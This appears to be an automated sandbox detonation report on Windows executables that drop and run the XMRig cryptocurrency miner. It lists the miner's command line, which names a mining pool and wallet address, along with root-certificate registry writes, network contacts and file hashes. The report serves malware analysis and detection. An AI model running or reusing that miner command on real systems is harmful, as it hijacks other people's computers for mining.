N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.147:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 147.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4652-16-0x00000242133D0000-0x00000242133F0000-memory.dmp

memory/4652-17-0x0000024213420000-0x0000024213440000-memory.dmp

memory/4652-18-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-21-0x0000024213460000-0x0000024213480000-memory.dmp

memory/4652-19-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-20-0x0000024213440000-0x0000024213460000-memory.dmp

memory/4652-22-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-23-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-24-0x0000024213440000-0x0000024213460000-memory.dmp

memory/4652-25-0x0000024213460000-0x0000024213480000-memory.dmp

memory/4652-26-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-27-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-28-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-29-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-30-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-31-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-32-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-33-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-34-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-35-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-36-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-37-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-38-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-39-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-40-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-41-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-42-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-43-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-44-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-45-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-46-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-47-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-48-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-49-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-50-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-51-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-52-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-53-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-54-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-55-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-56-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-57-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-58-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-59-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-60-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-61-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-62-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-63-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-64-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-65-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-66-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-67-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-68-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-69-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-70-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-71-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-72-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-73-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-74-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-75-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-76-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-77-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-78-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-79-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-80-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-81-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-82-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-83-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

memory/4652-84-0x00007FF7A6510000-0x00007FF7A7013000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:55

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.193:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 193.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
NL 23.62.61.193:443 www.bing.com tcp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
NL 23.62.61.193:443 www.bing.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4988-16-0x0000024474F50000-0x0000024474F70000-memory.dmp

memory/4988-17-0x00000244751A0000-0x00000244751C0000-memory.dmp

memory/4988-18-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-20-0x00000244751E0000-0x0000024475200000-memory.dmp

memory/4988-19-0x00000244751C0000-0x00000244751E0000-memory.dmp

memory/4988-21-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-22-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-25-0x00000244751E0000-0x0000024475200000-memory.dmp

memory/4988-24-0x00000244751C0000-0x00000244751E0000-memory.dmp

memory/4988-23-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-26-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-27-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-28-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-29-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-30-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-31-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

